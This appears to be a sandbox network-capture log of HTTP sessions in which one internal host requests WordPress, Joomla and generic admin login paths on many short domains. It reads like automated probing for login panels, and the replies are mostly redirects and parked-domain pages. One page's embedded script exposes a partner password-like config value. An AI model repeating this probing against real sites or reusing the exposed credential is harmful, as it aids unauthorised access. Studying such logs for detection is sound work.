Nov 30, 2023 11:22:39.962496996 CET	894	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/administrator/index.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_S7vf13zvxVXYwqLdj0XYmQF4RfwuciRH1uF2NyqMQTmEh48D0rQzXr96HDiVPT5CGRNj0NXUjRt1dntJtJBfWw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	58639	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.656665087 CET	225	OUT	GET /administrator/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.761223078 CET	418	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-67.ec2.internal X-Request-Id: 86494be6-38af-45f9-83b7-f80f57bfb9d8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>
Nov 30, 2023 11:22:39.764134884 CET	274	OUT	GET /administrator/index.php HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://a6a.com/administrator/
Nov 30, 2023 11:22:39.865401983 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-242.ec2.internal X-Request-Id: 55733347-539b-4bac-ae03-f55e7f017fb7 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	58641	13.248.169.48	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.656671047 CET	238	OUT	GET /administrator/index.php HTTP/1.1 Host: ct.ated.net Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.755922079 CET	1340	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 12477 Last-Modified: Mon, 13 Nov 2023 23:32:46 GMT Connection: keep-alive ETag: "6552b21e-30bd" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_aiAfydJAq7R/N6xSD5wfUNXdHja9dcWUFm9UXwV/BzYEDRQgx2hMDLxmEbsUqzU3dTe6CJ6BhEvbSaaoZcQgXQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><noscript><style>#content-main { display: none; }</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://www.enable-javascript.com/">instructions how to enable JavaScript in your w
Nov 30, 2023 11:22:39.755930901 CET	196	IN	Data Raw: 65 62 20 62 72 6f 77 73 65 72 3c 2f 61 3e 2e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 61 62 70 20 3d 20 75 6e 64 65 66 69 6e 65 64 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 Data Ascii: eb browser</a>.</div></noscript><script>var abp = undefined;</script><script src="/px.js?ch=1&abp=1"></script><script src="/px.js?ch=2&abp=1">
Nov 30, 2023 11:22:39.755940914 CET	1340	IN	Data Raw: 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 34 39 30 34 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 Data Ascii: </script><script>!function(){"use strict";var e={49040:function(e,t,n){function r(e){return!0===e\|\|"true"===e\|\|1===e\|\|"1"===e\|\|!1!==e&&"false"!==e&&0!==e&&"0"!==e&&null}n.d(t,{g:function(){return r}})},39631:function(e,t,n){n.d(t,{A:function()
Nov 30, 2023 11:22:39.756099939 CET	1340	IN	Data Raw: 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 65 6c 2e 49 4e 46 4f 2c 74 29 7d 7d 2c 7b 6b 65 79 3a 22 64 65 62 75 67 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 6c 6f 67 4d 65 73 73 61 67 65 28 65 2e 4c 65 76 Data Ascii: Message(e.Level.INFO,t)}},{key:"debug",value:function(t){return e.logMessage(e.Level.DEBUG,t)}},{key:"trace",value:function(t){return e.logMessage(e.Level.TRACE,t)}}]),e}();function i(e){if("object"===typeof e)try{return JSON.stringify(e)}catc
Nov 30, 2023 11:22:39.756108046 CET	338	IN	Data Raw: 44 53 45 4e 53 45 5f 41 44 54 45 53 54 3a 22 6f 66 66 22 2c 52 45 41 43 54 5f 41 50 50 5f 44 45 42 55 47 5f 4d 4f 44 45 3a 22 66 61 6c 73 65 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 41 52 54 4e 45 52 5f 50 57 Data Ascii: DSENSE_ADTEST:"off",REACT_APP_DEBUG_MODE:"false",REACT_APP_VERIZON_FEED_PARTNER_PW:"nameadmin_park_dm_2903_parkweb",REACT_APP_VERIZON_FEED_PARTNER_SN:"nameadmin_park_dm_2903_afternic",REACT_APP_VERIZON_FEED_PARTNER_CP:"nameadmin_park_dm_2903_g
Nov 30, 2023 11:22:39.756117105 CET	1340	IN	Data Raw: 75 65 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 52 4f 58 59 3a 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 61 77 73 2e 70 61 72 6b 69 6e 67 2e 67 6f 64 61 64 64 79 2e 63 6f 6d 22 2c 52 45 41 43 54 5f 41 50 50 5f 46 Data Ascii: ue",REACT_APP_VERIZON_FEED_PROXY:"https://api.aws.parking.godaddy.com",REACT_APP_FORWARDER_LANDER_URL_DAN:"https://dan.com/buy-domain/{DOMAIN}",REACT_APP_FORWARDER_LANDER_URL_TDFS_GD:"https://www.godaddy.com/forsale/{DOMAIN}?utm_source=TDFS_BI
Nov 30, 2023 11:22:39.756125927 CET	1340	IN	Data Raw: 41 49 4e 7d 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 74 72 61 66 66 69 63 5f 74 79 70 Data Ascii: AIN}?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&{QUERY}"},FORWARDER_LANDER_API:"https://api.afternic.com",NORMAL_DOMAIN_LENGTH_LIMIT:20}},15671:function(e,t,n){function r(e,t){i
Nov 30, 2023 11:22:39.756134033 CET	480	IN	Data Raw: 28 22 73 63 72 69 70 74 22 29 29 2e 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2c 75 2e 74 69 6d 65 6f 75 74 3d 31 32 30 2c 6e 2e 6e 63 26 26 75 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 6e 2e 6e 63 29 2c 75 2e 73 65 74 Data Ascii: ("script")).charset="utf-8",u.timeout=120,n.nc&&u.setAttribute("nonce",n.nc),u.setAttribute("data-webpack",t+a),u.src=r),e[r]=[o];var s=function(t,n){u.onerror=u.onload=null,clearTimeout(l);var o=e[r];if(delete e[r],u.parentNode&&u.parentNode.
Nov 30, 2023 11:22:39.756143093 CET	1340	IN	Data Raw: 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 26 26 65 21 3d 3d 53 79 6d 62 6f 6c 2e 70 72 6f 74 6f 74 79 70 65 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 2c Data Ascii: "==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},r(e)}n.d(t,{Z:function(){return r}})}},t={};function n(r){var o=t[r];if(void 0!==o)return o.exports;var a=t[r]={exports:{}};return e[r].call(a.exports,a,a.export
Nov 30, 2023 11:22:39.756160021 CET	1340	IN	Data Raw: 64 28 6e 75 6c 6c 2c 75 2e 6f 6e 6c 6f 61 64 29 2c 63 26 26 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 75 29 7d 7d 7d 28 29 2c 6e 2e 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 Data Ascii: d(null,u.onload),c&&document.head.appendChild(u)}}}(),n.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.p="https://
Nov 30, 2023 11:22:39.756169081 CET	1340	IN	Data Raw: 73 73 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 74 5b 6e 5d 3f 72 2e 70 75 73 68 28 74 5b 6e 5d 29 3a 30 21 3d 3d 74 5b 6e 5d 26 26 7b 31 33 31 3a 31 7d 5b 6e 5d 26 26 72 2e 70 75 73 68 28 74 5b 6e 5d 3d 65 28 6e 29 2e 74 68 65 6e 28 28 66 75 Data Ascii: ss=function(n,r){t[n]?r.push(t[n]):0!==t[n]&&{131:1}[n]&&r.push(t[n]=e(n).then((function(){t[n]=0}),(function(e){throw delete t[n],e})))}}}(),function(){var e={641:0};n.f.j=function(t,r){var o=n.o(e,t)?e[t]:void 0;if(0!==o)if(o)r.push(o[2]);el

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.4	58638	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.656961918 CET	223	OUT	GET /wp-login.php HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.757611036 CET	881	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_BwpKq2MTeUsXRMoxI/bg25wulaszQMoGHaZ+rCG5ZHz8l9sfyAcAD4gVQJycTej6V+wHe99qaezmDBY+6E38fw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:39.962558031 CET	881	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_BwpKq2MTeUsXRMoxI/bg25wulaszQMoGHaZ+rCG5ZHz8l9sfyAcAD4gVQJycTej6V+wHe99qaezmDBY+6E38fw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.076167107 CET	328	OUT	GET /wp-admin/ HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city="" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://96l.com/wp-login.php
Nov 30, 2023 11:22:41.178935051 CET	878	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_c0cyueDu5bdTzfnLDF6UTCncn0NluNB0qtzkvcTnwU0JmgEQQkOlMW079+o1Xn2KHK5ldIXlXiTC02w7ng6U7g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:41.386553049 CET	878	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:41 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/wp-admin/ X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_c0cyueDu5bdTzfnLDF6UTCncn0NluNB0qtzkvcTnwU0JmgEQQkOlMW079+o1Xn2KHK5ldIXlXiTC02w7ng6U7g Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.77;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.4	58636	3.33.224.147	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.657725096 CET	215	OUT	GET /admin HTTP/1.1 Host: hna.be Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.765681982 CET	499	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/admin X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Nov 30, 2023 11:22:39.973088980 CET	499	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://hna.be/admin X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
98	192.168.2.4	58633	15.197.172.60	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:39.657730103 CET	220	OUT	GET /wp-login.php HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:39.757185936 CET	927	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:39 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://1.tv/wp-login.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_QYatw3rsOglfJWMQnSF3CU1XH5Lm2x8n+awW5DPf3bCA/NGZjeYgpgKS2PWdKWhSThFPTUjsmyyOyNzYiMZ+Nw Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.163;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
